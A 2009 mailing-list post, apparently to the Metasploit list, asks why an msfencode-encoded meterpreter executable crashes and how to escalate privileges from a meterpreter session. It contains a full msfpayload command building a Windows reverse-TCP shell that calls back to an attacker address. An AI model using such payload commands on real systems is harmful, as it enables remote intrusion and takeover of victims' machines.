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From: anders.karlsson at (Karlsson Anders)
Date: Fri, 26 Jun 2009 10:08:10 +0200

I am have 2 questions I hope that you guys can help me solve?

I am running 3.3-dev version 6717.

First I am having some problems with msfencode. When creating a payload the exe file does not work (I am not getting 
any connection back to my computer from victim) and I can see that the exe file starts and closes/crashes? in Windows 
Task Manager on "victim".

I am using the command:
./msfpayload windows/meterpreter/reverse_tcp LHOST=(my_attacker_ip) LPORT=80 R | ./msfencode -b ' ' -t exe -o 

If I create the same payload without using msfencode (old style) the exe file works perfectly! What am I doing wrong 
with msfencode?

Sometimes a victim is not local admin on his machine (when running a payload like above, without exploitation).  How 
can I run "local exploits" on that machine from a meterpreter session like the "Local Privilege Escalation attacks" in 
Core Impact?  I want to be admin you know....


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